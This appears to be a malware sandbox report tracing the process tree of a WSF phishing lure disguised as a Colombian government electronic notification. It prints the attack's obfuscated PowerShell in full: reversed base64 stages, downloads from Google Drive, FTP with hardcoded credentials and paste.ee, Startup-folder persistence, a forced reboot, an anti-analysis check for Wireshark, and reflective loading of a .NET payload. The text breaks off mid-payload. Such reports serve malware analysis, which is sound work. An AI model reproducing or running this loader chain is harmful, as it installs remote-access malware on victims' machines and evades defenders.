[char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BQ20K5D\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2996
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BQ20K5D\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BQ20K5D\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2456
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3368
        
        C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        7⤵
        Drops file in Windows directory
        
        PID:3540
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3620
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    PID:2144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 